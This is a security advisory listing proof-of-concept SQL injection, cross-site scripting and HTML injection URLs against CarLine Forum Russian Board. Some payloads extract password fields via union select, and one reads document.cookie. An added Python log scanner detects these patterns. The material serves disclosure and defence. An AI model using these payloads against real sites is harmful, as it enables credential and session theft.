CarLine Forum Russian Board Multiple Input Validation Vulnerabilities

An exploit is not required.

The following proof of concept examples are available:

SQL injection:
menu_header.php?table_sql[users]=[SQL_CODE]
set.php?name_ig_array[1]=' OR 1=1/*
reply_in.php?subject_reply=1&name_reply=1'&message=1&email_reply=1&t=1
reply_in.php?subject_reply=1&name_reply=1&message=1&email_reply=1'&t=1
reply.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]=666' union select password,password from frb_users /*
new.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]=666' union select password,password from frb_users /*
edit_msg.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]=666' union select password,password from frb_users /*
memory.php?board_user_cook=1&board_user_id=1&board_user_passw=1&table_sql[users]=[SQL]
memory.php?board_user_cook=1&board_user_id=1&board_user_passw=1&table_sql[users]=[DB].[TBL]&table_sql[banlist]=[SQL]
line.php?board_user_id=1&board_user_cook=1&table_sql[users]=[SQL]
line.php?table_sql[online]=[SQL]
line.php?table_sql[online]=[DB].[TBL]&board_user_name_us=1'
line.php?table_sql[online]=[DB].[TBL]&board_user_name_us=1&url=1'
in.php?name_new=1'&subject_new=1&message=1&email_new=1&t=1
in.php?name_new=1&subject_new=1&message=1&email_new=1'&t=1
enter.php?sid='
enter.php?sid=1&passw='

Cross-site scripting:
menu_footer.php?rows_all=><script>alert("XSS");</script>
menu_footer.php?color_fon_info=><script>alert("XSS");</script>
menu_footer.php?target=><script>alert("XSS");</script>
menu_footer.php?patch_images="><script>alert("XSS");</script>
menu_footer.php?text_poisk_form="><script>alert("XSS");</script>
menu_header.php?board_user_name=<script>alert("XSS");</script>
menu_header.php?board_user_name=1&color_panel_edit=><script>alert("XSS");</script>
menu_header.php?target=><script>alert("XSS");</script>
menu_header.php?patch_images="><script>alert("XSS");</script>
menu_header.php?font_color_panel=><script>alert("XSS");</script>
menu_header.php?body_color_forum=><script>alert("XSS");</script>
menu_tema.php?body_color_forum=><script>alert("XSS");</script>
menu_tema.php?width_forum=><script>alert("XSS");</script>
menu_tema.php?cat=><script>alert("XSS");</script>
search.php?text_poisk=<script>alert("XSS");</script>
set.php?name_ig_array[]=<script>alert("XSS");</script>
reply.php?m_id=1&t=1&mid=1&cat=3&name_ig_array[1]="><script>alert("XSS");</script>
reply.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]="><script>alert("XSS");</script>
new.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]="><script>alert("XSS");</script>
new.php?m_id=1&t=1&mid=1&cat=3&name_ig_array[1]="><script>alert("XSS");</script>
edit_msg.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]="><script>alert("XSS");</script>
edit_msg.php?m_id=1&t=1&mid=1&cat=3&name_ig_array[1]="><script>alert("XSS");</script>

HTML injection:
[img]wink.gif onerror=javascript:alert(document.cookie);[/img]
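
Added example (not part of the original advisory and not CarLine code): a small access-log check for the query-string cases listed above, flagging requests that supply a table_sql[...] parameter or carry SQL or markup metacharacters in a parameter value. The /forum/ path, the sample log lines and the assumption that legitimate clients never send table_sql[...] are constructed for illustration; the [img] case travels in posted message content and is not covered.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Heuristics derived from the proof-of-concept list; expect false positives
# (a lone apostrophe in a poster's name will match SQL_META).
TABLE_PARAM = re.compile(r"^table_sql\[")  # assumption: never sent by real clients
SQL_META = re.compile(r"'|/\*|\bunion\b.+\bselect\b", re.I)
MARKUP = re.compile(r"[<>]")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines; /forum/ is a placeholder install path.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /forum/search.php?text_poisk=carburetor HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /forum/line.php?table_sql%5Bonline%5D=x.y HTTP/1.1" 200 812',
    '192.0.2.11 - - [01/Jan/2010:10:00:09 +0000] "GET /forum/set.php?name_ig_array%5B1%5D=%27%20OR%201%3D1%2F%2A HTTP/1.1" 200 640',
    '192.0.2.12 - - [01/Jan/2010:10:00:12 +0000] "GET /forum/menu_tema.php?cat=%3E%3Cscript%3Ealert(%22XSS%22)%3B%3C%2Fscript%3E HTTP/1.1" 200 901',
]

def classify(url):
    """Return a sorted list of findings for one request URL."""
    findings = set()
    # parse_qsl percent-decodes both names and values before we inspect them.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if TABLE_PARAM.match(name):
            findings.add("client-supplied table name")
        if SQL_META.search(value):
            findings.add("sql metacharacters")
        if MARKUP.search(value):
            findings.add("markup characters")
    return sorted(findings)

def scan(lines):
    """Return (script path, findings) for every log line that trips a check."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line we understand
        findings = classify(match.group(1))
        if findings:
            hits.append((urlsplit(match.group(1)).path, findings))
    return hits

if __name__ == "__main__":
    for path, findings in scan(SAMPLE_LOG):
        print(path, ", ".join(findings))
```
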


 

Copyright 2010, SecurityFocus